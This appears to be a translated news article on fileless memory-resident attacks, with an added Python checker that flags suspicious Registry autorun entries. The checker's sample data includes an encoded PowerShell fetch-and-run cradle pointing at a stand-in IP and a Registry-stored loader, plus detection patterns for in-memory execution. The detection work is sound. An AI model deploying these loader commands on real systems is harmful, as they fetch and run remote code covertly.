A security alert issued by five of the most powerful information security teams in the world warned of a wave of attacks expected in the coming period in which cyber criminals use the method of «fileless attacks», known as one of the most widely used methods in cyber attacks and one of the hardest to detect and confront, because it uses the electronic memory of computers and phones to carry out the attack, which in practice puts most protection, security and countermeasure software «out of the battle». The alert appeared in a lengthy report published by TechRepublic.com in September, attributed to experts in five of the most powerful information security teams in the world, those of the companies «Microsoft», «Trend Micro», Kaspersky, McAfee and Symantec.

The experts confirmed that the attacks will target devices and networks operating in different business sectors, such as telecommunications, banking, financial services, manufacturing, and the electricity and gas utilities, with the aim of stealing sensitive data, spreading viruses and encrypting files for ransom at the same time.

«Fileless attacks»

«Fileless attacks» are attacks in which no code, malware or commands are delivered in the form of files, either to reach the target or to carry out the attack itself.

To implement this idea, these attacks are carried out entirely in the memory chips of the target device, without touching the disk at all or downloading any file onto it, apart from simple text instructions entered into the system's registry («Registry») to modify the values and commands held there so that they serve the attack.

In this way the method differs radically from the hundreds of other methods used to launch attacks, which rely mainly on transferring and downloading files to the disk that carry a «payload» of malware, whether viruses, spyware, encryption programs or data stealers, then «tucking» these files away somewhere on the disk, unloading their payload in specific places, after which the payload installs and runs programs as directed by the attackers.

Difficult to detect

The danger of these attacks is that the overwhelming majority of monitoring and protection programs and systems are designed primarily to monitor, scan, detect and eliminate attacks and security threats on the basis of a single rule: files are downloaded to the disk, the attack is carried out from them, and all scanning, detection and control therefore deal with the disk. The fileless method thus leaves all these specialised protection systems and programs outside the «battlefield», which in this case is the memory chip rather than the disk, making it difficult to detect and repel the attack before it happens, or to stop and eliminate it while it is under way. The text instructions written into the Registry are the one persistent trace such an attack leaves, so inspecting them, together with the memory of running processes, has to take the place of scanning the disk.

Detection and remediation

The most effective measure in detecting these attacks is to monitor and scan memory, identify abnormal behavior and examine injected modules, said Jata Shariya, a supervisor on Microsoft's information security team for the development of the Microsoft Defender security system. In addition, from the starting point to the end of the process, the protection system charged with repelling the attack must be able to see the objects being loaded into memory, whether a payload or shellcode, stop them, and then kill the processes associated with them in order to halt the attack completely.

Microsoft's security team has made progress in this regard, Shariya said, giving the security component known as AMSI (the Antimalware Scan Interface) the ability to see what is happening in memory, monitor the attack's abnormal activity and stop it at the right point.
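An added example, not from the TechRepublic report or from any of the five vendors' products: a small Python checker for the two traits the article describes, the attack instructions written into the Registry as plain text (the section above on how the attacks work) and a payload that is decoded or fetched and run directly in memory (the detection approach described in this section). It reads autorun values as an inventory tool might export them, decodes PowerShell `-EncodedCommand` blobs and flags command lines that execute from memory or pull a script out of another registry value. All sample values, key paths, file paths and hosts are constructed for the example, and the indicator patterns are this example's own heuristics, not AMSI's or Microsoft Defender's logic; inspecting the Registry this way complements, and does not replace, the memory monitoring the article calls for.

```python
"""Added example: triage Windows autorun (Run key) values for the two
fileless traits the article describes, that is attack instructions
stored in the Registry as plain text, and a payload that is decoded or
downloaded and executed straight from memory.

Not vendor code. Sample data below is constructed; the indicator
patterns are this example's own heuristics, not AMSI's or Microsoft
Defender's logic.
"""
import base64
import re

# --- Constructed sample data (hypothetical paths, names and hosts) -------
# PowerShell's -EncodedCommand takes base64 of a UTF-16LE script.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
    .encode("utf-16-le")).decode()

# (key, value name, value data) as an autorun inventory would export them
SAMPLE_RUN_VALUES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     "powershell.exe -NoP -W Hidden -Enc " + _ENCODED),
    # Script body lives in another registry value; the Run entry only
    # reads it and pipes it to Invoke-Expression, so nothing touches disk.
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Loader",
     r'''powershell -w hidden -c "iex (gp 'HKCU:\Software\Classes\cfg').payload"'''),
]

# --- Indicators ---------------------------------------------------------
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b")
IN_MEMORY_EXEC = re.compile(
    r"(?i)\b(?:iex|invoke-expression|downloadstring|downloaddata|"
    r"invoke-webrequest|iwr|frombase64string|reflection\.assembly\]::load)\b")
REGISTRY_READ = re.compile(
    r"(?i)\b(?:gp|get-itemproperty|reg(?:\.exe)?\s+query)\b.*\bhk(?:cu|lm|cr|u)\b")


def decode_encoded_command(cmd):
    """Return the script hidden behind -EncodedCommand, or None."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed blob; treat as no encoded command


def analyze_command(cmd):
    """Return the fileless indicators present in one command line."""
    findings = []
    text = cmd
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded-command")
        text = cmd + "\n" + decoded  # judge the decoded script as well
    if HIDDEN_WINDOW.search(text):
        findings.append("hidden-window")
    if IN_MEMORY_EXEC.search(text):
        findings.append("in-memory-exec")
    if REGISTRY_READ.search(text):
        findings.append("registry-stored-script")
    return findings


def scan_run_values(values, min_hits=2):
    """Flag autorun entries carrying at least `min_hits` indicators."""
    alerts = []
    for key, name, data in values:
        hits = analyze_command(data)
        if len(hits) >= min_hits:
            alerts.append({"key": key, "name": name, "indicators": hits,
                           "decoded": decode_encoded_command(data)})
    return alerts


if __name__ == "__main__":
    for a in scan_run_values(SAMPLE_RUN_VALUES):
        print(f"{a['key']}\\{a['name']}: {', '.join(a['indicators'])}")
        if a["decoded"]:
            print("  decoded:", a["decoded"])
```

Run as is, the script reports the «Updater» and «Loader» entries and leaves the genuine OneDrive entry alone. The `min_hits` threshold is there because a single indicator (a hidden window, say) is common in legitimate administration scripts; it is the combination of a hidden window with in-memory execution or a script read back out of the Registry that matches the pattern the article describes.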

Origin and history

«Fileless attacks» emerged as an idea several years ago, but the idea was not carried out literally until recently; periodic security reports only began actually recording them in 2017 and early 2018, and at that time they were carried out at relatively low rates and in a somewhat primitive way, without causing extensive or sweeping damage.

But experts in the five information security teams say there has been a significant development in this type of attack, in quantity as well as in the quality and severity of the attacks, after the attackers advanced their tactics and gained experience in dealing with electronic memory modules.